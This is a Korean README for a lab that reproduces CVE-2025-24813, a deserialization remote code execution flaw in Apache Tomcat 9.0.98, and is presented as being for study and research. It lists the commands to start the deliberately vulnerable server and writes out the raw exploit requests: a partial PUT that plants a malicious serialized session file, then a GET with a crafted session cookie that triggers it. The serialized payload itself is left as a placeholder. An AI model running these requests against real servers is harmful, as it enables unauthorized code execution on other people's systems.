
tomcat CVE-2025-24813 역직렬화 RCE 환경
이 저장소는 CVE-2025-24813 Tomcat 최신 RCE를 재현하기 위한 환경입니다.
학습 및 연구 목적으로만 사용하세요!
본 환경은 위 재현 조건이 모두 활성화되어 있습니다
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
악의적인 직렬화 파일을 생성하고, 다음 패킷을 사용하여 업로드합니다. Range의 청크 값이 Length와 일치하고 현재 파일 길이보다 커야 합니다.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{역직렬화 파일 내용}}
다음 POC를 사용하여 트리거:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx